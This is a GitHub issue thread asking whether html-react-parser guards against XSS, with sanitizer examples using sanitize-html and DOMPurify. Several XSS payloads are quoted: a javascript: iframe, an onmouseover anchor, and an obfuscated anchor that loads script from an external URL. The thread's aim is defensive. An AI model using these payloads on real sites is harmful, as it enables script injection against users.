remarkablemark / html-react-parser

📝 HTML to React parser.
https://b.remarkabl.org/html-react-parser
MIT License
2.16k stars 130 forks source link

Does html-react-parser strip out XSS? #94

Closed dave-stevens-net closed 5 years ago

dave-stevens-net commented 5 years ago

I'm wanting to use html-react-parser to sanitize and parse HTML from my CMS. Does it effectively sanitize the input from XSS attacks? https://stackoverflow.com/questions/29044518/safe-alternative-to-dangerouslysetinnerhtml#answer-48261046 claims that it does. If so, I think it would be great to document / advertise this somewhere in the README. Thanks for your work on this.

remarkablemark commented 5 years ago

Great question @dave-stevens-net!

Unfortunately it doesn't. The reason is because I chose to make this library flexible rather than strict.

Although there is the replace option, checking against all possible attacks may be too much. I recommend instead using an XSS sanitizer with dangerouslySetInnerHTML.

dave-stevens-net commented 5 years ago

Good to know. Thanks for the quick response.

remarkablemark commented 5 years ago

You're very welcome. If this answers your question @dave-stevens-net, can the issue be closed?

remarkablemark commented 5 years ago

@dave-stevens-net I may have misspoke earlier about this library not being XSS safe.

I originally thought this library wasn't XSS-safe because dangerouslySetInnerHTML was relied here.

However, it seems that I'm unable to reproduce any XSS vulnerabilities. See my fiddle, which is based off of this example.

Let me know if you have any luck in reproducing XSS attacks.

harveydf commented 5 years ago

I managed to reproduce a simple XSS attack. There might be more.

Check my fiddle.

I found it in here https://www.in-secure.org/misc/xss/xss.html

dave-stevens-net commented 5 years ago

I ended up coding a Sanitize component using the sanitize-html package dependency.

import React from 'react'
import sanitizeHtml from 'sanitize-html'

const Sanitize = ({ html }) => {
    const clean = sanitizeHtml(html, {
        allowedTags: sanitizeHtml.defaults.allowedTags.concat(['img', 'span']),
        allowedAttributes: {
           ...
        },
    })
    return (
        <span
            className="sanitized-html"
            dangerouslySetInnerHTML={{ __html: clean }}
        />
    )
}
export default Sanitize

Example usage:

<Sanitize html={data.wordpressPage.title} />
remarkablemark commented 5 years ago

@harveydf Great find! Thanks for creating and sharing the fiddle.

I'll update the README.md to note that this library isn't XSS safe.

k1sul1 commented 5 years ago

I didn't want to use sanitize-html, because it's massive. I used dompurify instead, it's 10 times smaller, and doesn't remove CSS.

import parse, { domToReact } from 'html-react-parser'
import DOMPurify from 'dompurify'
import React from 'react'

// export function replaceNode() {}

export default function html(html, opts = {}) {
  return parse(DOMPurify.sanitize(html), {
    ...{
      replace: replaceNode,
    },
    ...opts,
  })
}

html('<iframe src=javascript:alert("xss")></iframe>')

remarkablemark commented 5 years ago

Thanks for sharing your approach using dompurify @k1sul1!

I created a Repl.it demo based on your example.

xkcdstickfigure commented 1 year ago

I managed to reproduce a simple XSS attack. There might be more.

Check my fiddle.

I found it in here https://www.in-secure.org/misc/xss/xss.html

Hey I know this is a pretty old comment but I just wanted to point out that this isn't actually an XSS issue since the JavaScript is running within the iframe. If you change the html to <iframe src=javascript:alert(location.href)></iframe>, you'll see that the URL it's running on is about:blank rather than the host page.

alexgleason commented 9 months ago

In the replace function, you can check domNode.name... so wouldn't it be inherently not possible to embed a script tag or iframe there if you just check if (['script', 'iframe'].includes(domNode.name)) return null ?

remarkablemark commented 9 months ago

@alexgleason there are many other ways to do XSS without <script> or <iframe>. For example:

<a onmouseover="alert()">xss</a>

Take a look at https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html

alexgleason commented 9 months ago

Ahh... that makes sense.

What I'm really trying to figure out is if this library is any worse than dangerouslySetInnerHTML. Is there a new attack surface outside of what's already possible with dangerouslySetInnerHTML?

remarkablemark commented 9 months ago

@alexgleason you should treat this library the same as dangerouslySetInnerHTML if you didn't sanitize the HTML string

alexgleason commented 9 months ago

Thank you for clarifying. A friend of mine got burned by this one earlier this year, so now I am extra paranoid:

@graf does btrfly support pleroma <a href='\r\nd&#x61t&#x61:text/html,<scr&#x69pt></scr&#x69pt\" src=\"https://i.poastcdn.org/b2977f2d97f598d2ebd6dcf37afd9047b5da2b6dc95a7b2824fb111c906fb117.js\" hidden'></a>

Fortunately I can't reproduce the attack using this library. I just gave it a try.

They were using a custom HTML parser that was vulnerable. This library seems to use the browser's DOMParser when it's availble. Therefore, I conclude it's no less secure than using dangerouslySetInnerHTML directly.